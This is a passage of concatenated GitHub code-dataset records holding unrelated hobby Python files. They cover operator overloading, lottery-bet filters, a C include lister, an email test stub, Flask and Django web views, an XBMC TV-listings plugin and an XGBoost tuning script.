#1.Duck Typing\n #2.Operator Overloading\n #3.Merhod Overloading\n #4.Method Overiding\n\na = 5\nb = 6\nprint(a+b) #11\nprint(int.__add__(a,b)) #11\n\n\na = '5'\nb = '6'\nprint(a+b) #56\nprint(str.__add__(a,b)) #56\n\nprint(\"-----------------------\")\n\nclass Student:\n def __init__(self,m1,m2):\n self.m1=m1\n self.m2=m2\n\n def __add__(self,other): #overload the + operator\n m1=self.m1 + other.m1\n m2=self.m2 + other.m2\n s3=Student(m1,m2)\n return s3\n \n def __gt__(self,other): #greater than\n r1=self.m1+self.m2\n r2=other.m1+other.m2\n if r1>r2:\n return True\n else:\n return False\n \n def __str__(self):\n return '{} {} '.format(self.m1, self.m2) \n\n\ns1=Student(75,80) \ns2=Student(25,65)\n\ns3=s1+s2\nprint(s3.m1) #100\n\nif s1>s2:\n print(\"s1 Win\") #s1 Win\nelse:\n print(\"s2 Win\")\n\nprint(\"---------------------\")\n\n#print(s1) #<__main__.Student object at 0x0307E640>\n#print(s1.__str__()) #<__main__.Student object at 0x0307E640>\n\nprint(s1) #75 80 Operator Overloading","repo_name":"DaminduSandaruwan/LearnPython","sub_path":"OOPs/Polymorphism/Operator Overloading.py","file_name":"Operator Overloading.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"8"} +{"seq_id":"31950576677","text":"import pandas as pd\n\nclass Filtro(object):\n def __init__(self, ativo):\n self.ativo = ativo\n\n def apply(self, df):\n raise NotImplementedError('Subclass must implement abstract method')\n\nclass FiltroResultadosAnteriores(Filtro):\n def __init__(self, dfFiltrado, dfResultados, ativo=True):\n super().__init__(ativo)\n self.dfFiltrado = dfFiltrado\n self.dfResultados = dfResultados\n\n def apply(self, df):\n indice = pd.DataFrame(self.dfFiltrado['CC'] - 1, columns=['CC']) # Convertemos a série para um DataFrame\n dfRAnteriores = pd.merge(indice, self.dfResultados, on='CC', how='inner') # Realizamos o merge com base na coluna 'CC'\n # dfRAnteriores['CCOriginal'] = dfRAnteriores['CC']+1\n dfRAnteriores = dfRAnteriores.assign(CCOriginal = dfRAnteriores['CC']+1)\n return dfRAnteriores\n\nclass FiltroQuaseTresPorLinha(Filtro):\n def __init__(self, ativo=True):\n super().__init__(ativo)\n\n def apply(self, df):\n if self.ativo:\n def is_quasi_three_per_line(pattern):\n # Contando o número de ocorrências de cada valor\n counts = {i: pattern.count(i) for i in pattern}\n # Verificando se o padrão atende ao critério\n return counts.get(3, 0) == 3 and counts.get(2, 0) == 1 and counts.get(4, 0) == 1\n\n # Filtrando o DataFrame\n return df[df['countL'].apply(is_quasi_three_per_line)]\n else:\n return df\n\nclass FiltroTresPorLinha(Filtro):\n def __init__(self, ativo=True):\n super().__init__(ativo)\n\n def apply(self, df):\n if self.ativo:\n # implementa a lógica de 3 números por linha\n rows = []\n for i, row in df.iterrows():\n # numbers = sorted(row[2:17])\n numbers = {row[f'B{j}'] for j in range(1, 16)}\n lines = [0]*5\n for num in numbers:\n lines[(num-1)//5] += 1\n if all(line == 3 for line in lines):\n rows.append(row)\n return pd.DataFrame(rows, columns=df.columns)\n else:\n return df\n\n\nclass FiltroDezenasParesImpares(Filtro):\n def __init__(self, dezenas_pares, dezenas_impares, ativo=True):\n super().__init__(ativo)\n self.dezenas_pares = dezenas_pares\n self.dezenas_impares = dezenas_impares\n\n def apply(self, df):\n if self.ativo:\n # implementa a lógica de dezenas pares e ímpares\n rows = []\n for i, row in df.iterrows():\n #numbers = row[2:17]\n numbers = {row[f'B{j}'] for j in range(1, 16)}\n 
par_count = sum(1 for num in numbers if num % 2 == 0)\n impar_count = sum(1 for num in numbers if num % 2 != 0)\n if par_count == self.dezenas_pares and impar_count == self.dezenas_impares:\n rows.append(row)\n return pd.DataFrame(rows, columns=df.columns)\n else:\n return df\n\nclass FiltroDezenaSemColunasSequenciasRepetidas(Filtro):\n def __init__(self, ativo=True):\n super().__init__(ativo)\n\n def apply(self, df):\n if self.ativo:\n rows = []\n for i, row in df.iterrows():\n if row['countCRE'] == 0:\n rows.append(row)\n return pd.DataFrame(rows, columns=df.columns)\n else:\n return df\n\nclass FiltroApostasN(Filtro):\n def __init__(self, ativo=True):\n super().__init__(ativo)\n\n def apply(self, df, num_rows, seed):\n if self.ativo:\n if len(df) < num_rows:\n raise ValueError(f\"The DataFrame only has {len(df)} rows, which is less than {num_rows}.\")\n else:\n return df.sample(n=num_rows, random_state=seed)\n else:\n return df\n\nclass FiltroFrequenciaDezenas(Filtro):\n def __init__(self, g1_count, g2_count, g3_count, g4_count, ativo=True):\n super().__init__(ativo)\n self.g1_count = g1_count\n self.g2_count = g2_count\n self.g3_count = g3_count\n self.g4_count = g4_count\n\n def apply(self, df):\n if self.ativo:\n # implementa a lógica de contagem de frequência de dezenas\n rows = []\n for i, row in df.iterrows():\n if (len(row['G1']) == self.g1_count and\n len(row['G2']) == self.g2_count and\n len(row['G3']) == self.g3_count and\n len(row['G4']) == self.g4_count):\n rows.append(row)\n return pd.DataFrame(rows, columns=df.columns)\n else:\n return df\n\nclass FiltraApostasNAH(Filtro):\n def __init__(self, ultimo, n_count, a_count, h_count, ativo=True):\n super().__init__(ativo)\n self.ultimo_resultado = ultimo\n self.n = n_count\n self.a = a_count\n self.h = h_count\n #self.apostas_geradas = dfApostas\n\n def apply(self, dfApostas):\n # implementa a lógica de dezenas pares e ímpares\n rows = []\n countN = 0\n countA = 0\n countH = 0\n for i, row in dfApostas.iterrows():\n numbers = {row[f'B{j}'] for j in range(1, 16)}\n countN = sum(1 for num in numbers if num in self.ultimo_resultado.NS_to_N)\n countA = sum(1 for num in numbers if num in self.ultimo_resultado.N_to_A)\n countH = sum(1 for num in numbers if num in self.ultimo_resultado.AH_to_H)\n\n if countN == self.n and countA == self.a and countH == self.h:\n rows.append(row)\n return pd.DataFrame(rows, columns=dfApostas.columns)\n\n\nclass ResultadosFiltrados(object):\n def __init__(self, dataframe, filtros):\n self.df = dataframe\n self.filtros = filtros\n\n def get_filtered_results(self):\n df_filtrado = self.df\n for filtro in self.filtros:\n df_filtrado = filtro.apply(df_filtrado)\n return df_filtrado\n","repo_name":"cesarac666/loterias","sub_path":"imports/allFiltersV3.py","file_name":"allFiltersV3.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"21926202984","text":"# dependency_graph.py\n#\n# This script walks over a C project and pretty prints all the includes per\n# .c/.h file.\nimport os\nimport sys\nimport re\n\nproject_path = sys.argv[1]\n\n# Excludes the last '/', because it leads to duplicate '/'s for files in the\n# provided directory.\nif project_path[-1].endswith(r'/'):\n project_path = project_path[:-1]\n\nstack = list()\nindent = 0\n\nfor root, _, files in os.walk(project_path, followlinks=False):\n for filename in files:\n if filename.endswith(r'.c') or filename.endswith(r'.h'):\n absolute_path = root + r'/' 
+ filename\n # latin-1 = iso-8859-1\n with open(absolute_path, r'rt', encoding=r'latin-1') as source:\n print(source.name + r':')\n\n indent = 1\n stack = []\n\n for line in source:\n include_match = re.findall(r'#include [<\"](.+.h(?:pp)?)[>\"]', line, re.ASCII)\n if include_match:\n print(r' '*indent + include_match[0])\n\n identifier_match = re.search(r'#ifdef (\\w+)', line, re.ASCII)\n if identifier_match:\n im = identifier_match.group(1)\n stack.append(im)\n print(r' '*indent + im)\n indent += 1\n elif line.startswith(r'#endif'):\n try:\n stack.pop()\n except IndexError:\n continue\n\n indent -= 1\n","repo_name":"aakordas/scripts","sub_path":"dependency_graph.py","file_name":"dependency_graph.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"27272193147","text":"from database import *\nimport unittest\nimport sqlite3\nimport os\n\neml = \"2023-10-05/test1.eml\"\n\nclass TestEmailFunctions(unittest.TestCase):\n\n def setUp(self):\n # Initialize a temporary test database\n self.conn = sqlite3.connect(\":memory:\") # Use an in-memory database for testing\n self.cursor = self.conn.cursor()\n self.create_database_table()\n\n def tearDown(self):\n # Close the database connection\n self.conn.close()\n\n def create_database_table(self):\n # Create the same table as in your main code\n self.cursor.execute('''\n CREATE TABLE emails (\n email_address TEXT PRIMARY KEY,\n to_address TEXT,\n from_address TEXT,\n ip_address TEXT,\n domain_name TEXT,\n email_body TEXT,\n spf_result TEXT\n dkim_result TEXT\n )\n ''')\n self.conn.commit()\n\n def test_extract_email_details(self):\n # Write test cases for extract_email_details function\n # You can use temporary EML files or mock data\n # Use self.assertEqual or self.assertTrue to check the expected output\n from_address, to_address, subject, _ = extract_email_details(eml)\n #print(f\"from_address: {from_address}\")\n # print(f\"to_address: {to_address}\")\n #print(f\"subject: {subject}\")\n\n\n\n def test_extract_spf_result(self):\n # Write test cases for extract_spf_result function\n # You can use temporary EML files or mock data\n # Use self.assertEqual or self.assertTrue to check the expected output\n spf_result = extract_spf_result(eml)\n\n def test_database_operations(self):\n # Write test cases for database operations\n # You can use the database connection created in setUp\n # Insert data into the database and then retrieve it to check if it matches\n # Use self.assertEqual or self.assertTrue to check the expected output\n pass\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"fazilraja/email-study","sub_path":"test_eml.py","file_name":"test_eml.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"7062836638","text":"from flask import Flask,request, jsonify\nfrom tinydb import TinyDB, Query\nimport datetime as dt\nfrom flask_restplus import Resource, Api\n\napp = Flask(__name__)\napi = Api(app)\n\n#Saving to DB\ndb=TinyDB('./db.json')\nUser = Query()\n\n#Current Date\ntoday = dt.date.today()\n\n@app.route('/', methods=['GET'])\ndef home():\n return ('''\n

Version: 1.1

\n

Hello World Application

DevOps Engineer Test

\n A simple Hello World application that exposes GET and PUT API calls.\n
Hint: This is a RESTful web service! Append a username to the URL after hello (for example: /hello/mayank -d { \"dateOfBirth\" : \"1988-12-01\" }) with data.
\\n'''\n )\n\n@app.route('/hello/', methods=['GET', 'PUT'])\ndef index(userName):\n try:\n if request.method == 'PUT':\n if request.headers['Content-Type'] == 'application/json':\n data = request.get_json()\n db.upsert({'name': userName, \"dob\": data['dateOfBirth']}, User.name == userName)\n return ('', 204)\n else:\n return (\"Data MUST be in JSON Type\")\n if request.method == 'GET':\n searchValue = db.search(User.name == userName)\n newValue = searchValue[0]\n birth = dt.datetime.strptime(newValue['dob'], '%Y-%m-%d')\n if ( today.month == birth.month and today.day >= birth.day or today.month > birth.month ):\n nextBirthYear = today.year + 1\n else: \n nextBirthYear = today.year\n nextBirthday = dt.date(nextBirthYear, birth.month, birth.day)\n diff = nextBirthday - today\n if ( today == birth.date() ):\n return jsonify({\"message\" : f\"Hello, {userName}! Happy Birthday\"})\n else:\n # diff = nextBirthday - today\n return jsonify({\"message\" : f\"Hello, {userName}! Your birthday is in {diff.days} days.\"})\n except IndexError:\n return '''SORRY Page Not Found:\\n\n

NOTE: Username must contain only letters and make sure before GET request use PUT request to add dateOfBirth for username

''' \n\n@app.errorhandler(404)\ndef page_not_found(e):\n return ('''SORRY Page Not Found:\\n\n Hint: This is a RESTful web service! Append a username to the URL after hello (for example: /hello/mayank -d { \"dateOfBirth\" : \"1988-12-01\" }) with data.\\n''')\n\nif __name__==\"__main__\":\n app.run(host='0.0.0.0', port=80, debug=True)","repo_name":"manukoli1986/DevOpsR","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"27611539434","text":"############################################################################################################\r\n# TV Data source: TSReader\r\n# Notes:\r\n# parses an XMLTV file from TSReader\r\n#\r\n# REVISION HISTORY:\r\n# 01/11/05 Created\r\n# 07/11/05 2nd attempt :)\r\n# 12/02/07 Now uses smbLib, several smb funcs removed\r\n# GUI config added and overhauled to make it faster.\r\n############################################################################################################\r\n\r\nimport time, os, smb\r\nfrom mytvLib import *\r\nfrom smbLib import ConfigSMB, smbConnect, smbFetchFile, isNewSMBFile\r\nimport mytvGlobals\r\n\r\n__language__ = sys.modules[\"__main__\"].__language__\r\n\r\nCHANNELS_REGEX = 'channel id=\"(.*?)\".*?display-name lang=\"en\">(.*?)<'\r\nCHANNEL_REGEX = 'start=\"(\\d\\d\\d\\d\\d\\d\\d\\d)(\\d\\d\\d\\d\\d\\d)\" stop=\"(\\d+)\".*?title>(.*?)<.*?desc>(.*?)<'\r\nXMLTV_FILE = 'xmltv.xml'\r\n\r\nclass ListingData:\r\n\tdef __init__(self, cache):\r\n\t\tdebug(\"ListingData.__init__\")\r\n\r\n\t\tself.cache = cache\r\n\t\tself.name = os.path.splitext(os.path.basename( __file__))[0]\t# get filename without path & ext\r\n\t\tself.CHANNELS_FILENAME = os.path.join(cache,\"Channels_\"+ self.name + \".dat\")\r\n\t\tself.localSMBFile = os.path.join(cache,XMLTV_FILE)\r\n\t\tself.checkedRemoteFileToday = False\r\n\t\tself.connectionError = False\r\n\t\tself.isConfigured = False\r\n\r\n\t\t# smb vars\r\n\t\tself.remote = None\r\n\t\tself.remoteInfo = None\r\n\t\tself.smbIP = None\r\n\t\tself.smbPath = None\r\n\t\tself.smbRemoteFile = None\r\n\r\n\tdef getName(self):\r\n\t\treturn self.name\r\n\r\n\t# download or load if exists, a list of all available channels.\r\n\t# return: list [chID, chName]\r\n\tdef getChannels(self):\r\n\t\tdebug(\"> ListingData.getChannels()\")\r\n\t\tchannelList = []\r\n\t\tif self.isConfigured:\r\n\t\t\t# fetch file if not exists\r\n\t\t\tif not fileExist(self.CHANNELS_FILENAME):\r\n\t\t\t\t# if no local XML file, fetch from SMB\r\n\t\t\t\tif not fileExist(self.localSMBFile):\r\n\t\t\t\t\tself.getRemoteFile()\r\n\r\n\t\t\t\t# extract data from file using regex - this is specific to this file format\r\n\t\t\t\tdata = readFile(self.localSMBFile)\r\n\t\t\t\tif data:\r\n\t\t\t\t\tmatches = findAllRegEx(data, CHANNELS_REGEX)\r\n\t\t\t\t\tchannelList = writeChannelsList(self.CHANNELS_FILENAME, matches)\r\n\t\t\telse:\r\n\t\t\t\t# read in [channel id, channel name]\r\n\t\t\t\tchannelList = readChannelsList(self.CHANNELS_FILENAME)\r\n\r\n\t\tdebug(\"< ListingData.getChannels()\")\r\n\t\treturn channelList\r\n\r\n\r\n\t# download channel data, using either dayDelta or dataDate.\r\n\t# filename = filename to save downloaded data file as.\r\n\t# chID = unique channel ID, used to reference channel in URL.\r\n\t# chName = display name of channel\r\n\t# dayDelta = day offset from today. 
ie 0 is today, 1 is tomorrow ...\r\n\t# fileDate = use to calc programme start time in secs since epoch.\r\n\t# return Channel class or -1 if http fetch error, or None for other\r\n\tdef getChannel(self, filename, chID, chName, dayDelta, fileDate):\r\n\t\tdebug(\"> ListingData.getChannel() dayDelta: %s chID=%s fileDate=%s\" % (dayDelta,chID,fileDate))\r\n\t\tprogList = []\r\n\t\tif self.isConfigured:\r\n\t\t\tif not self.checkedRemoteFileToday:\r\n\t\t\t\tself.getRemoteFile(False) # fetch only if newer\r\n\t\t\t\tself.checkedRemoteFileToday = True\r\n\r\n\t\t\tif fileExist(self.localSMBFile):\r\n\t\t\t\tprogList = self.createChannelFiles(chID, int(fileDate))\r\n\t\t\telse:\r\n\t\t\t\tdebug(\"file missing \" + self.localSMBFile)\r\n\r\n\t\tdebug(\"< ListingData.getChannel()\")\r\n\t\treturn progList\r\n\r\n\t############################################################################################################\r\n\t# determine highest start date for any channel.\r\n\t# this will help prevent unnwanted processing when curr. date nearing end of\r\n\t# dates contained with XML\r\n\t############################################################################################################\r\n#\tdef findHeighestStartDate(self, data):\r\n#\t\tdebug(\"> ListingData.findHeighestStartDate() current self.highestDate=\"+str(self.highestDate))\r\n#\t\tregex = 'start=\\\"(\\d\\d\\d\\d\\d\\d\\d\\d)'\r\n#\t\tmatches = findAllRegEx(data, regex)\r\n#\t\tif matches:\r\n#\t\t\tmatches.sort()\r\n#\t\t\tlastMatch= int(matches[-1])\r\n#\t\t\tif lastMatch > self.highestDate:\r\n#\t\t\t\tself.highestDate = lastMatch\r\n#\t\tdebug(\"< ListingData.findHeighestStartDate() new self.highestDate=\"+str(self.highestDate))\r\n\r\n\t\t\r\n\t############################################################################################################\r\n\t# extract data from file using regex - this is specific to TSReader file format\r\n\tdef createChannelFiles(self, chID, searchDate):\r\n\t\tdebug(\"> ListingData.createChannelFiles() chID=%s searchDate=%s\" % (chID, searchDate))\r\n\t\tprogList = []\r\n\r\n\t\tdialogProgress.update(0, __language__(312))\r\n\t\tdata = readFile(self.localSMBFile)\r\n\t\tif data:\r\n\t\t\tmatches = parseDocList(data, CHANNEL_REGEX, 'channel id=\"'+chID,'channel id=')\r\n\t\t\tfor prog in matches:\r\n\t\t\t\tstartDate = prog[0]\t\t\t\t\t\t\t# YYYYMMDD\r\n\t\t\t\tif int(startDate) < searchDate:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\telif (int(startDate) > searchDate):\r\n\t\t\t\t\tbreak\r\n\t\t\t\telse:\r\n\t\t\t\t\tstartTime = prog[1]\t\t\t\t\t\t# HHMMSS\r\n\t\t\t\t\tendDateTime = prog[2]\t\t\t\t\t# YYYYMMDDHHMM\r\n\t\t\t\t\ttitle = decodeEntities(prog[3])\r\n\t\t\t\t\tdesc = decodeEntities(prog[4])\r\n\t\t#\t\t\tprint startDate, startTime, endDateTime, title\r\n\t\t\t\t\t# calc programme start time in secs since epoch based on programme date\r\n\t\t\t\t\tstartTimeSecs = time.mktime(time.strptime(startDate+startTime,\"%Y%m%d%H%M%S\"))\r\n\t\t\t\t\tendTimeSecs = time.mktime(time.strptime(endDateTime,\"%Y%m%d%H%M%S\"))\r\n\t\t\t\t\tprogList.append( {\r\n\t\t\t\t\t\t\tTVData.PROG_STARTTIME : float(startTimeSecs),\r\n\t\t\t\t\t\t\tTVData.PROG_ENDTIME : float(endTimeSecs),\r\n\t\t\t\t\t\t\tTVData.PROG_TITLE : title,\r\n\t\t\t\t\t\t\tTVData.PROG_DESC : desc\r\n\t\t\t\t\t\t} )\r\n\r\n\t\t\tif progList:\r\n\t\t\t\tprogList = setChannelEndTimes(progList)\t\t# update endtimes\r\n\r\n\t\tdel data\r\n\t\tdebug(\"< ListingData.createChannelFiles() progs count=%s\" % len(progList))\r\n\t\treturn 
progList\r\n\r\n\t############################################################################################################\r\n\t# create a SMB connection and fetch remote file\r\n\tdef getRemoteFile(self, fetchAlways=True):\r\n\t\tdebug(\"> ListingData().getRemoteFile() fetchAlways=%s\" % fetchAlways)\r\n\t\tdownloaded = False\r\n\r\n\t\tif not self.connectionError:\r\n\t\t\tif not self.remote or not self.remoteInfo:\r\n\t\t\t\tself.remote, self.remoteInfo = smbConnect(self.smbIP, self.smbPath)\r\n\r\n\t\t\tif self.remote and self.remoteInfo:\r\n\t\t\t\tif fetchAlways or isNewSMBFile(self.remote, self.remoteInfo, self.localSMBFile, self.smbRemoteFile):\r\n\t\t\t\t\tdownloaded = smbFetchFile(self.remote, self.remoteInfo, self.localSMBFile, self.smbRemoteFile, silent=False)\r\n\t\t\t\t\tif downloaded == None:\r\n\t\t\t\t\t\tself.connectionError = True\r\n\t\t\telse:\r\n\t\t\t\tself.connectionError = True\r\n\r\n\t\tdebug(\"< ListingData.getRemoteFile() downloaded=%s connectionError=%s\" % (downloaded, self.connectionError))\r\n\t\treturn downloaded\r\n\r\n\r\n\t############################################################################################################\r\n\tdef config(self, reset=False):\r\n\t\tdebug(\"> ListingData.config() reset=%s\" % reset)\r\n\r\n\t\ttitle = \"%s - %s\" % (self.name, __language__(976))\r\n\t\tconfigSMB = ConfigSMB(title, fnTitle=__language__(977), fnDefaultValue=XMLTV_FILE)\r\n\t\tif reset:\r\n\t\t\tconfigSMB.ask()\r\n\r\n\t\tsmbDetails = configSMB.checkAll(silent=True)\r\n\t\tif smbDetails:\r\n\t\t\tself.smbIP, self.smbPath, self.smbRemoteFile = smbDetails\r\n\t\t\tself.isConfigured = True\r\n\t\telse:\r\n\t\t\tself.isConfigured = False\r\n\t\tself.connectionError = False\t# will allow a retry after a config change\r\n\r\n\t\tdebug(\"< ListingData.config() isConfigured=%s\" % self.isConfigured)\r\n\t\treturn self.isConfigured\r\n","repo_name":"amitca71/xbmc-scripting","sub_path":"myTV/resources/datasource/pc_TSReader.py","file_name":"pc_TSReader.py","file_ext":"py","file_size_in_byte":7456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"3932650416","text":"from zope.interface import Interface\nfrom zope import schema\n\nfrom zope.i18nmessageid import Message as _ # requires explicit domain\n\nclass IRSSListing(Interface):\n \"\"\"A content type, which displays an RSS feed in the same way as\n RSS Portlet does.\n \"\"\"\n\n # Cloned from: plone.app.portlets.portlets.rss.IRSSPortlet\n count = schema.Int(title=_(u'Number of items to display', domain=\"plone\"),\n description=_(u'How many items to list.', domain=\"plone\"),\n required=True,\n default=5)\n url = schema.Text(title=_(u'List of RSS feed URLs', domain=\"jyu.rsslisting\"),\n description=_(u'List of links to the RSS feeds to display. Please, enter only one link per line.',\n domain=\"jyu.rsslisting\"),\n required=True,\n default=u'')\n timeout = schema.Int(title=_(u'Feed reload timeout', domain=\"plone\"),\n description=_(u'Time in minutes after which the feed should be reloaded.', domain=\"plone\"),\n required=True,\n default=100) \n\n showMoreEnabled = schema.Bool(\n title=_(u'Show link to show more', domain=\"jyu.rsslisting\"),\n description=_(u'When set there will be link at the end to show all the results. 
If there is more than one RSS feed defined, only the first RSS feed will be linked.', domain=\"jyu.rsslisting\"),\n required = False,\n )\n","repo_name":"Gomez/jyu.rsslisting","sub_path":"jyu/rsslisting/interfaces/rsslisting.py","file_name":"rsslisting.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"71499742981","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 2 12:18:47 2019\n\n@author: Dave\n\"\"\"\n\n\nfrom zipfile import ZipFile\nimport glob\nimport os\nimport re\nimport string\n\ndef BuildConsolidatedFile(datadir):\n matchstring = '^[^a-zA-Z]*(?P[a-zA-Z]+)'\n\n rg = re.compile(matchstring)\n removepunc = string.punctuation[:6] + string.punctuation[7:12] + string.punctuation[13:]\n HEoutfile = open(os.path.join(datadir,'HE_Characters.txt'), 'w')\n SHEoutfile = open(os.path.join(datadir,'SHE_Characters.txt'), 'w')\n for filepath in glob.glob(os.path.join(datadir,'*.zip')):\n #open the zip files to read the files\n \n zipfile = ZipFile(filepath)\n \n for fname in zipfile.infolist():\n if not fname.is_dir() and not fname.filename.startswith('__MACOSX'): \n with zipfile.open(fname) as f:\n try: \n for i, l in enumerate(f):\n \n s = l.decode('ascii').strip()\n m = rg.match(s)\n \n outstring = s[m.start('MTCH'):].lower().translate(str.maketrans('','',removepunc))\n #check if a match exists\n if m.group('MTCH').lower() == 'he':\n #parse out the string to start with the part found\n HEoutfile.write(outstring)\n HEoutfile.write(\"\\n\")\n if m.group('MTCH').lower() == 'she':\n #parse out the string to start with the part found \n SHEoutfile.write(outstring)\n SHEoutfile.write(\"\\n\")\n except:\n pass\n \n HEoutfile.close()\n SHEoutfile.close()\n \n return {\"hefile\":os.path.join(datadir,'HE_Characters.txt'),\n \"shefile\":os.path.join(datadir,'SHE_Characters.txt')}\n\n\n","repo_name":"debreceni/FE595_BLPCharacters","sub_path":"HeroFiles.py","file_name":"HeroFiles.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"15062108465","text":"import warnings\nwarnings.filterwarnings('ignore')\n\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\n\nimport optuna\nfrom optuna.samplers import TPESampler\n\nimport xgboost as xgb\nfrom xgboost import XGBClassifier\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import log_loss\n\nSEED = 42\n\ndata = pd.read_csv(\"C:/Users/na018/Desktop/capstone/2023-1-Capstone-Design/iris.csv\")\ndata.drop('Id', axis=1, inplace=True)\n\ncategorical_cols = []\nfor col in data.columns:\n if data[col].dtype == 'object':\n categorical_cols.append(col)\n\nif categorical_cols:\n labelencoder = LabelEncoder()\n for col in categorical_cols:\n data[col] = labelencoder.fit_transform(data[col])\n\nX = data.drop('Species', axis=1)\ny = data['Species']\n\nlabelencoder_y = LabelEncoder()\ny = labelencoder_y.fit_transform(y)\n\nscaler = MinMaxScaler()\nX = scaler.fit_transform(X)\n\ndef objective(trial):\n params = {'reg_lambda': trial.suggest_float(\"reg_lambda\", 1e-5, 1.0),\n 'reg_alpha': trial.suggest_float(\"reg_alpha\", 1e-5, 1.0),\n 'max_depth': trial.suggest_int(\"max_depth\", 4,100),\n 'colsample_bytree': trial.suggest_float(\"colsample_bytree\", 0.1, 1),\n 'subsample': trial.suggest_loguniform(\"subsample\", 0.5, 1),\n 
'learning_rate': trial.suggest_loguniform(\"learning_rate\", 1e-5, 1e-1),\n 'n_estimators': trial.suggest_int(\"n_estimators\", 100, 3000),\n 'min_child_samples': trial.suggest_int(\"min_child_samples\", 5, 100),\n 'random_state': 42, 'num_class': 3}\n \n x_train, x_valid, y_train, y_valid = train_test_split(X, y, test_size=0.1, random_state=SEED, stratify=y)\n \n dtrain = xgb.DMatrix(x_train, label=y_train)\n dvalid = xgb.DMatrix(x_valid, label=y_valid)\n \n model = XGBClassifier(**params)\n model.fit(x_train, y_train, eval_set=[(x_valid, y_valid)], eval_metric='mlogloss', verbose=0, early_stopping_rounds=100)\n \n predictions = model.predict(x_valid)\n \n score = f1_score(y_valid, predictions, average='macro')\n \n return score\n\nsampler = TPESampler(seed=SEED)\nstudy = optuna.create_study(direction=\"maximize\", sampler=sampler)\nstudy.optimize(objective, n_trials=100)\n\nbest_params = study.best_params\nprint(best_params)","repo_name":"cain0709/2023-1-Capstone-Design","sub_path":"generated_model/iris_lgbm_1684680601.py","file_name":"iris_lgbm_1684680601.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"7612163","text":"import math\n\nfrom flask import (\n Blueprint, flash, g, redirect, render_template, request, url_for\n)\n\nfrom repopip.local_repo.repo import Repo\nfrom repopip.local_repo.configurator import Configurator\nfrom repopip.translations.translator import Translator\n\nrepo = Repo()\ntranslator = Translator()\ntranslations = translator.translations\napp_lang = 'en'\n\nbp = Blueprint('site', __name__)\n\n@bp.route('/')\n@bp.route('/')\ndef index(lang = app_lang):\n if(lang not in translator.translations):\n lang = app_lang\n translation = {**translations[lang]['nav'], **translations[lang]['index'], **translations[lang]['footer']}\n \n return render_template('pages/index.html.j2', **translation, terminal = True)\n\n\n@bp.route('/contact')\n@bp.route('//contact')\ndef contact(lang = app_lang):\n if(lang not in translator.translations):\n lang = app_lang\n translation = {**translations[lang]['nav'], **translations[lang]['contact'], **translations[lang]['footer']}\n return render_template('pages/contact.html.j2', **translation)\n\n\n@bp.route('/packages')\n@bp.route('//packages')\ndef packages(lang = app_lang):\n if(lang not in translator.translations):\n lang = app_lang\n translation = {**translations[lang]['nav'], **translations[lang]['packages'], **translations[lang]['footer']}\n \n repo.loadPackages()\n packages = repo.packages\n repo_len = len(packages)\n total = (repo_len, repo.total_versions)\n\n if(request.args.get('all')):\n return render_template('pages/packages.html.j2', **translation, packages_dict = packages, total = total, size = repo.size)\n\n page = request.args.get('page')\n if(page is not None and page.isnumeric()):\n page = int(page)\n else:\n page = 1\n\n step = 12\n total_pages = math.ceil(repo_len/step)\n start = page * step - step\n end = start + step\n slice_packages = dict(list(packages.items())[start:end])\n data_pages = {\n 'current': page,\n 'total_pages': total_pages\n }\n return render_template('pages/packages.html.j2', **translation, packages_dict = slice_packages, total = total, size = repo.size, data_pages = data_pages)\n\n\n@bp.route('/config', methods=['GET', 'POST'])\n@bp.route('//config', methods=['GET', 'POST'])\ndef configuration(lang = app_lang):\n if(lang not in translator.translations):\n lang = app_lang\n translation = 
{**translations[lang]['nav'], **translations[lang]['configuration'], **translations[lang]['footer']}\n\n if(request.method == \"POST\"):\n try:\n if(request.json.get('config') == 'standar'):\n c = Configurator(request.json.get('level'))\n else:\n c = Configurator(request.json.get('level'), request.json.get('config'))\n\n c.config()\n return { 'result':True }\n except:\n return { 'result':False }\n else:\n configs = Configurator().searchConfigs() \n\n return render_template('pages/configuracion.html.j2', **translation, configs = configs)\n\n@bp.route('/get-configs', methods=['GET', 'POST'])\ndef getConfigs():\n try:\n configs = Configurator().searchConfigs()\n return { 'error': False, 'configs': configs }\n except Exception:\n return { 'error' : True }","repo_name":"luiserp/local_repo","sub_path":"repopip/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"70449603141","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.urls import reverse\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.core.files.base import ContentFile\nfrom django.http import JsonResponse\nfrom django.views.decorators.http import require_POST\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom .forms import LoginForm, UserRegistrationForm, UserEditForm, ProfileEditForm\nfrom .models import Profile, Contact\nfrom common.decorators import ajax_required\nfrom actions.utils import create_action\nfrom actions.models import Action\n\n\n# def user_login(request):\n# if request.method == 'POST':\n# form = LoginForm(request.POST)\n# if 